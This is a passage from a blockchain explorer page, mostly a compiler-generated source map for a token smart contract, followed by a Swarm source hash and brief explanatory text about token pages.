;;;42097:9;41968:138;41950:1511;;;42138:13;;;;42133:210;;-1:-1:-1;;;;;42202:25:0;;;;;;:19;:25;;;;;;;;;:52;;-1:-1:-1;;;;;;42231:23:0;;;;;;:19;:23;;;;;;;;42202:52;42172:155;;;;-1:-1:-1;;;42172:155:0;;10455:2:1;42172:155:0;;;10437:21:1;10494:2;10474:18;;;10467:30;10533:31;10513:18;;;10506:59;10582:18;;42172:155:0;10253:353:1;42172:155:0;-1:-1:-1;;;;;42405:31:0;;;;;;:25;:31;;;;;;;;:88;;;;-1:-1:-1;;;;;;42458:35:0;;;;;;:31;:35;;;;;;;;42457:36;42405:88;42383:1067;;;42568:20;;42558:6;:30;;42528:164;;;;-1:-1:-1;;;42528:164:0;;10813:2:1;42528:164:0;;;10795:21:1;10852:2;10832:18;;;10825:30;10891:34;10871:18;;;10864:62;10962:30;10942:18;;;10935:58;11010:19;;42528:164:0;10611:424:1;42528:164:0;42767:9;;-1:-1:-1;;;;;11213:18:0;;11181:7;11213:18;;;;;;;;;;;42741:22;;:6;:22;:::i;:::-;:35;;42711:135;;;;-1:-1:-1;;;42711:135:0;;11242:2:1;42711:135:0;;;11224:21:1;11281:2;11261:18;;;11254:30;11320:28;11300:18;;;11293:56;11366:18;;42711:135:0;11040:350:1;42711:135:0;42383:1067;;;-1:-1:-1;;;;;42928:29:0;;;;;;:25;:29;;;;;;;;:88;;;;-1:-1:-1;;;;;;42979:37:0;;;;;;:31;:37;;;;;;;;42978:38;42928:88;42906:544;;;43091:20;;43081:6;:30;;43051:165;;;;-1:-1:-1;;;43051:165:0;;11597:2:1;43051:165:0;;;11579:21:1;11636:2;11616:18;;;11609:30;11675:34;11655:18;;;11648:62;11746:31;11726:18;;;11719:59;11795:19;;43051:165:0;11395:425:1;42906:544:0;-1:-1:-1;;;;;43243:35:0;;;;;;:31;:35;;;;;;;;43238:212;;43355:9;;-1:-1:-1;;;;;11213:18:0;;11181:7;11213:18;;;;;;;;;;;43329:22;;:6;:22;:::i;:::-;:35;;43299:135;;;;-1:-1:-1;;;43299:135:0;;11242:2:1;43299:135:0;;;11224:21:1;11281:2;11261:18;;;11254:30;11320:28;11300:18;;;11293:56;11366:18;;43299:135:0;11040:350:1;43299:135:0;43522:4;43473:28;11213:18;;;;;;;;;;;43580;;43556:42;;;;;;;43629:35;;-1:-1:-1;43653:11:0;;;;;;;43629:35;:61;;;;-1:-1:-1;43682:8:0;;-1:-1:-1;;;43682:8:0;;;;43681:9;43629:61;:110;;;;-1:-1:-1;;;;;;43708:31:0;;;;;;:25;:31;;;;;;;;43707:32;43629:110;:153;;;;-1:-1:-1;;;;;;43757:25:0;;;;;;:19;:25;;;;;;;;43756:26;43629:153;:194;;;;-1:-1:-1;;;;;;43800:23:0;;;;;;:19;:23;;;;;;;;43799:24;43629:194;43611:326;;;43850:8;:15;;-1:-1:-1;;;;43850:15:0;-1:-1:-1;;;43850:15:0;;;43882:10;:8;:10::i;:::-;43909:8;:16;;-1:-1:-1;;;;43909:16:0;;;43611:326;43965:8;;-1:-1:-1;;;;;44028:25:0;;43949:12;44028:25;;;:19;:25;;;;;;43965:8;-1:-1:-1;;;43965:8:0;;;;;43964:9;;44006:5;;44028:25;;:52;;-1:-1:-1;;;;;;44057:23:0;;;;;;:19;:23;;;;;;;;44028:52;44024:100;;;44107:5;44097:15;;44024:100;44136:12;44169:7;44165:1032;;;-1:-1:-1;;;;;44221:29:0;;;;;;:25;:29;;;;;;;;:50;;;;;44270:1;44254:13;;:17;44221:50;44217:831;;;44311:6;;44299:65;;44352:11;;44299:48;;44311:6;;:14;;:6;:14;:34;;44340:5;44311:34;;;44326:13;;44311:34;44299:6;;:10;:48::i;:::-;:52;;:65::i;:::-;44292:72;;44433:13;;44413:16;;44406:4;:23;;;;:::i;:::-;44405:41;;;;:::i;:::-;44383:18;;:63;;;;;;;:::i;:::-;;;;-1:-1:-1;;44515:13:0;;44495:16;;44488:23;;:4;:23;:::i;:::-;44487:41;;;;:::i;:::-;44465:18;;:63;;;;;;;:::i;:::-;;;;-1:-1:-1;;44601:13:0;;44579:18;;44572:25;;:4;:25;:::i;:::-;44571:43;;;;:::i;:::-;44547:20;;:67;;;;;;;:::i;:::-;;;;-1:-1:-1;44217:831:0;;-1:-1:-1;44217:831:0;;-1:-1:-1;;;;;44676:31:0;;;;;;:25;:31;;;;;;;;:51;;;;;44726:1;44711:12;;:16;44676:51;44672:376;;;44755:33;44784:3;44755:24;44766:12;;44755:6;:10;;:24;;;;:::i;:33::-;44748:40;;44856:12;;44837:15;;44830:4;:22;;;;:::i;:::-;44829:39;;;;:::i;:::-;44807:18;;:61;;;;;;;:::i;:::-;;;;-1:-1:-1;;44936:12:0;;44917:15;;44910:22;;:4;:22;:::i;:::-;44909:39;;;;:::i;:::-;44887:18;;:61;;;;;;;:::i;:::-;;;;-1:-1:-1;;45020:12:0;;44999:17;;44992:24;;:4;:24;:::i;:::-;44991:41;;;;:::i;:::-;44967:20;;:65;;;;;;;:::i;:::-;;;;-1:-1:-1;;44672:376:0;45068:8;;45064:91;;45097:42;45113:4;45127;45134;45097:15;:42::i;:::-;45171:14;45181:4;45171:14;;:::i;:::-;;;44165:1032;45209:33;45225:4;45231:2;45235:6;45209:15;:33::i;:::-;-1:-1:-1;;45269:11:0;;45253:13;:27;-1:-1:-1;;;;;;41565:3723:0:o;2666:132::-;2574:6;;-1:-1:-1;;;;;2574:6:0;1126:10;2730:23;2722:68;;;;-1:-1:-1;;;2722:68:0;;12160:2:1;2722:68:0;;;12142:21:1;;;12179:18;;;12172:30;12238:34;12218:18;;;12211:62;12290:18;;2722:68:0;11958:356:1;3798:191:0;3891:6;;;-1:-1:-1;;;;;3908:17:0;;;-1:-1:-1;;;;;;3908:17:0;;;;;;;3941:40;;3891:6;;;3908:17;3891:6;;3941:40;;3872:16;;3941:40;3861:128;3798:191;:::o;15537:877::-;-1:-1:-1;;;;;15668:18:0;;15660:68;;;;-1:-1:-1;;;15660:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15747:16:0;;15739:64;;;;-1:-1:-1;;;15739:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15889:15:0;;15867:19;15889:15;;;;;;;;;;;15937:21;;;;15915:109;;;;-1:-1:-1;;;15915:109:0;;12521:2:1;15915:109:0;;;12503:21:1;12560:2;12540:18;;;12533:30;12599:34;12579:18;;;12572:62;-1:-1:-1;;;12650:18:1;;;12643:36;12696:19;;15915:109:0;12319:402:1;15915:109:0;-1:-1:-1;;;;;16060:15:0;;;:9;:15;;;;;;;;;;;16078:20;;;16060:38;;16278:13;;;;;;;;;;:23;;;;;;16330:26;;1596:25:1;;;16278:13:0;;16330:26;;1569:18:1;16330:26:0;;;;;;;16369:37;41565:3723;46175:1781;46258:4;46214:23;11213:18;;;;;;;;;;;46214:50;;46275:25;46345:20;;46324:18;;46303;;:39;;;;:::i;:::-;:62;;;;:::i;:::-;46275:90;-1:-1:-1;46376:12:0;46405:20;;;:46;;-1:-1:-1;46429:22:0;;46405:46;46401:85;;;46468:7;;;46175:1781::o;46401:85::-;46520:18;;:23;;46541:2;46520:23;:::i;:::-;46502:15;:41;46498:115;;;46578:18;;:23;;46599:2;46578:23;:::i;:::-;46560:41;;46498:115;46625:23;46738:1;46705:17;46670:18;;46652:15;:36;;;;:::i;:::-;46651:71;;;;:::i;:::-;:88;;;;:::i;:::-;46625:114;-1:-1:-1;46750:26:0;46779:36;:15;46625:114;46779:19;:36::i;:::-;46750:65;-1:-1:-1;46856:21:0;46890:36;46750:65;46890:16;:36::i;:::-;46939:18;46960:44;:21;46986:17;46960:25;:44::i;:::-;46939:65;;47017:23;47043:81;47096:17;47043:34;47058:18;;47043:10;:14;;:34;;;;:::i;:81::-;47017:107;;47135:25;47163:83;47218:17;47163:36;47178:20;;47163:10;:14;;:36;;;;:::i;:83::-;47135:111;-1:-1:-1;47259:23:0;47135:111;47285:28;47298:15;47285:10;:28;:::i;:::-;:48;;;;:::i;:::-;47367:1;47346:18;:22;;;47379:18;:22;;;47412:20;:24;47259:74;-1:-1:-1;47453:19:0;;;;;:42;;;47494:1;47476:15;:19;47453:42;47449:278;;;47512:46;47525:15;47542;47512:12;:46::i;:::-;47682:18;;47578:137;;;12928:25:1;;;12984:2;12969:18;;12962:34;;;13012:18;;;13005:34;;;;47578:137:0;;;;;;12916:2:1;47578:137:0;;;47449:278;47761:15;;47753:81;;-1:-1:-1;;;;;47761:15:0;;;;47804;;47753:81;;;;47804:15;47761;47753:81;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;47867:17:0;;47859:89;;47739:95;;-1:-1:-1;;;;;;47867:17:0;;47912:21;;47859:89;;;;47912:21;47867:17;47859:89;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;;;46175:1781:0:o;25043:98::-;25101:7;25128:5;25132:1;25128;:5;:::i;:::-;25121:12;25043:98;-1:-1:-1;;;25043:98:0:o;25442:::-;25500:7;25527:5;25531:1;25527;:5;:::i;24686:98::-;24744:7;24771:5;24775:1;24771;:5;:::i;45296:501::-;45386:16;;;45400:1;45386:16;;;;;;;;45362:21;;45386:16;;;;;;;;;;-1:-1:-1;45386:16:0;45362:40;;45431:4;45413;45418:1;45413:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;45413:23:0;;;-1:-1:-1;;;;;45413:23:0;;;;;45457:15;-1:-1:-1;;;;;45457:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;45447:4;45452:1;45447:7;;;;;;;;:::i;:::-;;;;;;:32;-1:-1:-1;;;;;45447:32:0;;;-1:-1:-1;;;;;45447:32:0;;;;;45492:62;45509:4;45524:15;45542:11;45492:8;:62::i;:::-;45593:196;;-1:-1:-1;;;45593:196:0;;-1:-1:-1;;;;;45593:15:0;:66;;;;:196;;45674:11;;45700:1;;45716:4;;45743;;45763:15;;45593:196;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;45351:446;45296:501;:::o;45805:362::-;45886:62;45903:4;45918:15;45936:11;45886:8;:62::i;:::-;45961:15;-1:-1:-1;;;;;45961:31:0;;46000:9;46033:4;46053:11;46079:1;46095;46111:7;2574:6;;-1:-1:-1;;;;;2574:6:0;;2501:87;46111:7;45961:198;;;;;;-1:-1:-1;;;;;;45961:198:0;;;-1:-1:-1;;;;;15124:15:1;;;45961:198:0;;;15106:34:1;15156:18;;;15149:34;;;;15199:18;;;15192:34;;;;15242:18;;;15235:34;15306:15;;;15285:19;;;15278:44;46133:15:0;15338:19:1;;;15331:35;15040:19;;45961:198:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;45805:362;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1632:456::-;1709:6;1717;1725;1778:2;1766:9;1757:7;1753:23;1749:32;1746:52;;;1794:1;1791;1784:12;1746:52;1833:9;1820:23;1852:31;1877:5;1852:31;:::i;:::-;1902:5;-1:-1:-1;1959:2:1;1944:18;;1931:32;1972:33;1931:32;1972:33;:::i;:::-;1632:456;;2024:7;;-1:-1:-1;;;2078:2:1;2063:18;;;;2050:32;;1632:456::o;2490:247::-;2549:6;2602:2;2590:9;2581:7;2577:23;2573:32;2570:52;;;2618:1;2615;2608:12;2570:52;2657:9;2644:23;2676:31;2701:5;2676:31;:::i;2742:248::-;2810:6;2818;2871:2;2859:9;2850:7;2846:23;2842:32;2839:52;;;2887:1;2884;2877:12;2839:52;-1:-1:-1;;2910:23:1;;;2980:2;2965:18;;;2952:32;;-1:-1:-1;2742:248:1:o;2995:416::-;3060:6;3068;3121:2;3109:9;3100:7;3096:23;3092:32;3089:52;;;3137:1;3134;3127:12;3089:52;3176:9;3163:23;3195:31;3220:5;3195:31;:::i;:::-;3245:5;-1:-1:-1;3302:2:1;3287:18;;3274:32;3344:15;;3337:23;3325:36;;3315:64;;3375:1;3372;3365:12;3315:64;3398:7;3388:17;;;2995:416;;;;;:::o;3416:180::-;3475:6;3528:2;3516:9;3507:7;3503:23;3499:32;3496:52;;;3544:1;3541;3534:12;3496:52;-1:-1:-1;3567:23:1;;3416:180;-1:-1:-1;3416:180:1:o;3601:388::-;3669:6;3677;3730:2;3718:9;3709:7;3705:23;3701:32;3698:52;;;3746:1;3743;3736:12;3698:52;3785:9;3772:23;3804:31;3829:5;3804:31;:::i;:::-;3854:5;-1:-1:-1;3911:2:1;3896:18;;3883:32;3924:33;3883:32;3924:33;:::i;3994:380::-;4073:1;4069:12;;;;4116;;;4137:61;;4191:4;4183:6;4179:17;4169:27;;4137:61;4244:2;4236:6;4233:14;4213:18;4210:38;4207:161;;4290:10;4285:3;4281:20;4278:1;4271:31;4325:4;4322:1;4315:15;4353:4;4350:1;4343:15;4207:161;;3994:380;;;:::o;4379:127::-;4440:10;4435:3;4431:20;4428:1;4421:31;4471:4;4468:1;4461:15;4495:4;4492:1;4485:15;4511:125;4576:9;;;4597:10;;;4594:36;;;4610:18;;:::i;4986:400::-;5188:2;5170:21;;;5227:2;5207:18;;;5200:30;5266:34;5261:2;5246:18;;5239:62;-1:-1:-1;;;5332:2:1;5317:18;;5310:34;5376:3;5361:19;;4986:400::o;5391:168::-;5464:9;;;5495;;5512:15;;;5506:22;;5492:37;5482:71;;5533:18;;:::i;5564:217::-;5604:1;5630;5620:132;;5674:10;5669:3;5665:20;5662:1;5655:31;5709:4;5706:1;5699:15;5737:4;5734:1;5727:15;5620:132;-1:-1:-1;5766:9:1;;5564:217::o;9443:401::-;9645:2;9627:21;;;9684:2;9664:18;;;9657:30;9723:34;9718:2;9703:18;;9696:62;-1:-1:-1;;;9789:2:1;9774:18;;9767:35;9834:3;9819:19;;9443:401::o;9849:399::-;10051:2;10033:21;;;10090:2;10070:18;;;10063:30;10129:34;10124:2;10109:18;;10102:62;-1:-1:-1;;;10195:2:1;10180:18;;10173:33;10238:3;10223:19;;9849:399::o;11825:128::-;11892:9;;;11913:11;;;11910:37;;;11927:18;;:::i;13392:127::-;13453:10;13448:3;13444:20;13441:1;13434:31;13484:4;13481:1;13474:15;13508:4;13505:1;13498:15;13524:251;13594:6;13647:2;13635:9;13626:7;13622:23;13618:32;13615:52;;;13663:1;13660;13653:12;13615:52;13695:9;13689:16;13714:31;13739:5;13714:31;:::i;13780:980::-;14042:4;14090:3;14079:9;14075:19;14121:6;14110:9;14103:25;14147:2;14185:6;14180:2;14169:9;14165:18;14158:34;14228:3;14223:2;14212:9;14208:18;14201:31;14252:6;14287;14281:13;14318:6;14310;14303:22;14356:3;14345:9;14341:19;14334:26;;14395:2;14387:6;14383:15;14369:29;;14416:1;14426:195;14440:6;14437:1;14434:13;14426:195;;;14505:13;;-1:-1:-1;;;;;14501:39:1;14489:52;;14596:15;;;;14561:12;;;;14537:1;14455:9;14426:195;;;-1:-1:-1;;;;;;;14677:32:1;;;;14672:2;14657:18;;14650:60;-1:-1:-1;;;14741:3:1;14726:19;14719:35;14638:3;13780:980;-1:-1:-1;;;13780:980:1:o;15377:306::-;15465:6;15473;15481;15534:2;15522:9;15513:7;15509:23;15505:32;15502:52;;;15550:1;15547;15540:12;15502:52;15579:9;15573:16;15563:26;;15629:2;15618:9;15614:18;15608:25;15598:35;;15673:2;15662:9;15658:18;15652:25;15642:35;;15377:306;;;;;:::o

Swarm Source

ipfs://d561153e57a8217f1fcd761904b15af518ff5adaea3e4db93196695753e606c4
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.